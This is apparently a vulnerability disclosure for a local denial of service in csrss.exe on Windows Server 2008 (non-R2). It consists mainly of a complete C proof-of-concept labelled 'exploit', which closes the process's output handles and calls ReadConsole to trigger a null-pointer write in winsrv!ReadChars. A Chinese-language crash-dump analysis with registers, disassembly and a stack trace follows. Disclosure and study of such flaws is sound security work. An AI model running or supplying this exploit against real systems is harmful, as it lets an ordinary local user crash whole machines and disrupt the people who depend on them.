影响: Windows Server 2008（初版，即常被称为 "R1" 的非 R2 版本；其他版本是否同样受影响未在本文验证）。
exploit:
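/* Free-standing PoC listing: it needs the Win32 declarations (DWORD, HANDLE,
 * GetStdHandle, CloseHandle, ReadConsole, STD_*_HANDLE). */
#include <windows.h>

/*
 * PoC: make csrss.exe (the console server) fault while it services a
 * ReadConsole request from this process.
 *
 * Sequence: close this process's own STDOUT and STDERR handles, then ask
 * the console server to read from STDIN. The request is serviced inside
 * csrss.exe (winsrv!SrvReadConsole -> winsrv!ReadChars) and, according to
 * the crash dump accompanying this listing, faults on a write to address
 * 0x0000000C there. csrss.exe is a critical system process, so the effect
 * is a denial of service of the whole machine from an ordinary console
 * session — run this only on a disposable test system.
 *
 * argc/argv: unused.
 * Returns 0 if ReadConsole reported success, 1 if there is no console or
 * ReadConsole failed. Control only comes back here if csrss.exe survived
 * the request.
 */
int main(int argc, char *argv[])
{
    (void)argc;
    (void)argv;

    /* ReadConsole counts characters, not bytes, and resolves to either the
     * ANSI or the wide variant depending on UNICODE; a TCHAR array sized in
     * elements keeps the buffer correct in both builds. */
    TCHAR buf[5];
    DWORD nread = 0;

    /* Closing the two output handles is the trigger. GetStdHandle returns
     * the process's real standard handles (not duplicates), so CloseHandle
     * really removes them. NULL / INVALID_HANDLE_VALUE mean "no such handle";
     * closing those would just fail, so they are skipped. */
    HANDLE out = GetStdHandle(STD_OUTPUT_HANDLE);
    HANDLE err = GetStdHandle(STD_ERROR_HANDLE);
    if (out != NULL && out != INVALID_HANDLE_VALUE) {
        CloseHandle(out);
    }
    if (err != NULL && err != INVALID_HANDLE_VALUE) {
        CloseHandle(err);
    }

    /* Without an input console handle the request never reaches csrss. */
    HANDLE in = GetStdHandle(STD_INPUT_HANDLE);
    if (in == NULL || in == INVALID_HANDLE_VALUE) {
        return 1;
    }

    /* Same 5-character read as the original PoC; the size is derived from
     * the buffer so the two cannot drift apart. */
    if (!ReadConsole(in, buf, (DWORD)(sizeof buf / sizeof buf[0]), &nread, NULL)) {
        return 1;
    }
    return 0;
}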
原因: C:\Windows\system32\csrss.exe 访问冲突，在地址 756DB6A1（即下方栈回溯中的 winsrv!ReadChars+0x3c2）写入无效地址 0000000C。结合寄存器 esi=00000000 与该处指令 ff460c（inc dword ptr [esi+0Ch]）可知，这是对空指针偏移 0xC 处的写操作，即 csrss.exe 内部的空指针解引用。csrss.exe 是关键系统进程，其崩溃通常会触发系统 bugcheck（蓝屏），因此普通本地用户只需一个控制台程序即可造成整机拒绝服务。
eax=015c0da8 ebx=00000000 ecx=00000000 edx=015c14a8 esi=00000000 edi=015c0dc8
eip=756db6a1 esp=0083f5d0 ebp=0083f6a0 iopl=0 nv up ei pl zr
na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
进程基目录表1F187040不匹配CR3 1F187360
001b:756db6a1 ff460c          inc     dword ptr [esi+0Ch]    ds:0023:0000000c=????????
756db6a1 ff460c          inc     dword ptr [esi+0Ch]
756db6a4 8b8d54ffffff    mov     ecx,dword ptr [ebp-0ACh]
756db6aa 898570ffffff    mov     dword ptr [ebp-90h],eax
756db6b0 8a8059010000    mov     al,byte ptr [eax+159h]
756db6b6 8845b3          mov     byte ptr [ebp-4Dh],al
756db6b9 8a471c          mov     al,byte ptr [edi+1Ch]
756db6bc 66834da4ff      or      word ptr [ebp-5Ch],0FFFFh
756db6c1 66834da6ff      or      word ptr [ebp-5Ah],0FFFFh
ChildEBP RetAddr Args to Child
0083f6a0 756dbd5e 015c0dc8 015c0da8 002a0058 winsrv!ReadChars+0x3c2
0083f6f8 757359e4 015c0da8 0083f80c 945f0621 winsrv!SrvReadConsole+0x102
0083f86c 76f77ca3 00000000 7781fc7b 00000000 CSRSRV!CsrApiRequestThread+0x3b1
0083f8ac 76f9e489 75735633 00000000 ffffffff ntdll!__RtlUserThreadStart+0x35
0083f8c4 00000000 75735633 00000000 00000000 ntdll!_RtlUserThreadStart+0x1b
